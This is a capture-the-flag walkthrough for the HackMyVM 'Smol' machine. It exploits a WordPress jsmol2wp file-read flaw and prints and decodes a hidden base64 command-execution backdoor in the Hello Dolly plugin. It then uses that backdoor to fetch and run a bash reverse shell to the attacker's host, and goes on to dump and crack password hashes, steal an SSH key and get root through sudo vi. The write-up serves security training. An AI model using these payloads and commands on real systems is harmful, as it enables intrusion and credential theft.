HackMyVm Smol Walkthrough

Target: https://hackmyvm.eu/machines/machine.php?vm=Smol

Visiting the target by IP address returns an error and the address bar shows www.smol.hmv, so add that name to /etc/hosts first. Then scan the ports:

└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 16:03 CST
Nmap scan report for www.smol.hmv (192.168.56.130)
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 6.3
|_http-title: AnotherCTF
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:BF:B5:36 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 serves a WordPress site. Running wpscan against it finds an interesting plugin, whose name resembles the machine's name, and also enumerates several users:

└─$ wpscan --url http://www.smol.hmv -e u,p
...
[i] Plugin(s) Identified:

[+] jsmol2wp
 | Location: http://www.smol.hmv/wp-content/plugins/jsmol2wp/
 | Latest Version: 1.07 (up to date)
 | Last Updated: 2018-03-09T10:28:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.07 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt

Searching for this plugin shows it has a known LFI vulnerability: jsmol.php accepts a php://filter URL in its query parameter and returns the file it points to. Requesting http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php (four levels up from the plugin's php/ directory is the site root) returns the database username and password:

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

The same username and password also log in to http://www.smol.hmv/wp-admin (the database password is reused for the wpuser WordPress account). Once logged in, the page http://www.smol.hmv/index.php/to-do/ lists the notes below; the first one is a hint that the hello-dolly plugin may contain a backdoor.

1- [IMPORTANT] Check Backdoors: Verify the SOURCE CODE of “Hello Dolly” plugin as the site’s code revision.

2- Set Up HTTPS: Configure an SSL certificate to enable HTTPS and encrypt data transmission.

3- Update Software: Regularly update your CMS, plugins, and themes to patch vulnerabilities.

...

Using the same LFI, read the hello-dolly plugin source (hello.php lives directly in wp-content/plugins/, two levels above jsmol.php's php/ directory): http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php. The hello_dolly() function contains an eval() that is not in the stock plugin:

// This just echoes the chosen line, we'll position it later.
function hello_dolly() {
    eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));

    $chosen = hello_dolly_get_lyric();
    $lang   = '';
    if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
        $lang = ' lang="en"';
    }

    printf(
        '<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
        __( 'Quote from Hello Dolly song, by Jerry Herman:' ),
        $lang,
        $chosen
    );
}

Decoding the base64 gives:

└─$ echo CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA= |base64 -d

 if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }   
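Decoding such payloads by hand is error-prone, so here is an added helper (not from the original post) that decodes the base64 from hello_dolly() and resolves the PHP double-quoted string escapes (octal \143, hex \x64) to recover the names of the request parameters the backdoor reads. It handles both double- and single-quoted PHP string keys, since only the former process octal and hex escapes.

```python
"""Decode an eval(base64_decode(...)) payload and resolve PHP string escapes."""
import base64
import re

# Payload copied from the backdoored hello_dolly() function above.
PAYLOAD_B64 = (
    "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRb"
    "IlwxNDNceDZkXDE0NCJdKTsgfSA="
)

# Escapes PHP interprets inside "..." strings: \xHH, \ooo, \u{...}, \n etc.
_ESCAPE = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|u\{[0-9A-Fa-f]+\}|.)", re.S)
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "f": "\f",
           "e": "\x1b", "\\": "\\", "$": "$", '"': '"'}


def decode_php_escapes(s: str) -> str:
    """Resolve the escapes PHP applies inside a double-quoted string."""
    def repl(m):
        e = m.group(1)
        if e[0] == "x" and len(e) > 1:
            return chr(int(e[1:], 16))
        if e[0] in "01234567":
            return chr(int(e, 8) & 0xFF)   # PHP wraps octal > \377 modulo 256
        if e.startswith("u{"):
            return chr(int(e[2:-1], 16))
        return _SIMPLE.get(e, "\\" + e)    # unknown escapes stay literal, as in PHP
    return _ESCAPE.sub(repl, s)


# $_GET["..."] / $_GET['...'] (and the other request superglobals).
_REQ_KEY = re.compile(
    r"""\$_(GET|POST|REQUEST|COOKIE)\[\s*(?:"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)')\s*\]"""
)


def request_keys(php_src: str) -> set:
    """Names of request parameters the source reads, with escapes resolved."""
    keys = set()
    for _, dq, sq in _REQ_KEY.findall(php_src):
        if dq:
            keys.add(decode_php_escapes(dq))          # "..." : full escape processing
        else:
            keys.add(re.sub(r"\\(['\\])", r"\1", sq))  # '...' : only \' and \\
    return keys


def decode_payload(b64: str) -> str:
    """Base64-decode the eval() argument back to PHP source."""
    return base64.b64decode(b64).decode("utf-8", "replace")


if __name__ == "__main__":
    src = decode_payload(PAYLOAD_B64)
    print(src.strip())
    print("parameters read:", request_keys(src))
```

The same decoder is handy for any obfuscated webshell: grep for eval(base64_decode and feed the argument in, then look at which request keys come out.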

The escapes \143\155\x64 and \143\x6d\144 are both just the string "cmd" written as octal and hex escapes, so it never appears literally in the source. hello_dolly() runs whenever a wp-admin page renders, so while logged in, requesting any admin page with a cmd parameter executes arbitrary system commands as the web server user. Write a bash reverse shell on the attacking machine and serve it over HTTP:

└─$ cat rev.sh      
/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.101/1234 0>&1'
└─$ sudo python -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Have the target fetch rev.sh from our HTTP server and save it as /tmp/rev.sh by requesting:

http://www.smol.hmv/wp-admin/index.php?cmd=wget http://192.168.56.101/rev.sh -O /tmp/rev.sh

Then start a listener on port 1234 locally and have the target run the downloaded script to get a shell:

http://www.smol.hmv/wp-admin/index.php?cmd=bash /tmp/rev.sh

The shell runs as www-data:

└─$ nc -nlvp 1234                    
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.130] 45582
bash: cannot set terminal process group (825): Inappropriate ioctl for device
bash: no job control in this shell
www-data@smol:/var/www/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, log in to MySQL as wpuser with the password from wp-config.php and dump the password hashes of all WordPress users:

mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
| ID | user_login | user_pass                          | user_nicename | user_email         | user_url            | user_registered     | user_activation_key | user_status | display_name           |
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
|  1 | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0 | admin         | admin@smol.thm     | http://www.smol.hmv | 2023-08-16 06:58:30 |                     |           0 | admin                  |
|  2 | wpuser     | $P$BfZjtJpXL9gBwzNjLMTnTvBVh2Z1/E. | wp            | wp@smol.thm        | http://smol.thm     | 2023-08-16 11:04:07 |                     |           0 | wordpress user         |
|  3 | think      | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/ | think         | josemlwdf@smol.thm | http://smol.thm     | 2023-08-16 15:01:02 |                     |           0 | Jose Mario Llado Marti |
|  4 | gege       | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1 | gege          | gege@smol.thm      | http://smol.thm     | 2023-08-17 20:18:50 |                     |           0 | gege                   |
|  5 | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1 | diego         | diego@smol.thm     | http://smol.thm     | 2023-08-17 20:19:15 |                     |           0 | diego                  |
|  6 | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN/ | xavi          | xavi@smol.thm      | http://smol.thm     | 2023-08-17 20:20:01 |                     |           0 | xavi                   |
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+

Cracking the hashes recovers diego's password. Switch to that user:

└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.130] 36626
bash: cannot set terminal process group (825): Inappropriate ioctl for device
bash: no job control in this shell
www-data@smol:/var/www/wordpress/wp-admin$ su diego
su diego
Password: sandiegocalifornia
id
uid=1002(diego) gid=1002(diego) groups=1002(diego),1005(internal)

Looking around as diego shows that think's id_rsa is readable: /home/think is group-readable by internal, which diego belongs to, and both .ssh and the key itself are mode 755.

diego@smol:~$ cd /home
cd /home
diego@smol:/home$ cd think
cd think
diego@smol:/home/think$ cd .ssh
cd .ssh
diego@smol:/home/think/.ssh$ ls -la
ls -la
total 20
drwxr-xr-x 2 think think    4096 Jun 21  2023 .
drwxr-x--- 5 think internal 4096 Oct 24 21:41 ..
-rwxr-xr-x 1 think think     572 Jun 21  2023 authorized_keys
-rwxr-xr-x 1 think think    2602 Jun 21  2023 id_rsa
-rwxr-xr-x 1 think think     572 Jun 21  2023 id_rsa.pub

Copy id_rsa to the local machine (ssh refuses a key file readable by others, so chmod 600 it first); it now grants SSH access as think:

└─$ ssh think@192.168.56.130 -i id_rsa
...
think@smol:~$ id
uid=1000(think) gid=1000(think) groups=1000(think),1004(dev),1005(internal)

Continuing as think, /home/gege contains wordpress.old.zip, but it is owned by root:gege with mode 750, so think cannot read it:

think@smol:~$ cd /home/gege
think@smol:/home/gege$ ls -la
total 31536
drwxr-x--- 3 gege internal     4096 Oct 24 21:42 .
drwxr-xr-x 6 root root         4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -> /dev/null
drwxr-x--- 2 gege gege         4096 Oct 24 21:42 wordpress.old
-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip
think@smol:/home/gege$ file wordpress.old.zip 
wordpress.old.zip: regular file, no read permission

/etc/group shows think and gege share the dev and internal groups. Shared group membership does not by itself allow switching users, but su - gege succeeds here without asking for a password, so the host's PAM configuration for su must permit it. Try it:

think@smol:/home/gege$ cat /etc/group
root:x:0:
...
xavi:x:1001:
diego:x:1002:
gege:x:1003:
dev:x:1004:think,gege
internal:x:1005:diego,gege,think,xavi
think@smol:/home/gege$ su - gege
gege@smol:~$ id
uid=1003(gege) gid=1003(gege) groups=1003(gege),1004(dev),1005(internal)

wordpress.old.zip is readable as gege. Copy it to the local machine; unzip asks for a password, so extract a hash with zip2john and crack it with john first:

└─$ zip2john wordpress.old.zip > zip_hash.txt
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt

After extracting the archive, its wp-config.php contains xavi's password. Switch from gege to xavi and check sudo privileges:

xavi@smol:~$ sudo -l
[sudo] password for xavi: 
Matching Defaults entries for xavi on smol:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User xavi may run the following commands on smol:
    (ALL : ALL) /usr/bin/vi /etc/passwd

As the sudo rule suggests, run sudo /usr/bin/vi /etc/passwd, then from vi's normal mode type :!bash to spawn a shell. Because sudo started vi as root, the child shell is root as well:

root@smol:/home/xavi$ id
uid=0(root) gid=0(root) groups=0(root)
root@smol:/home/xavi$ 
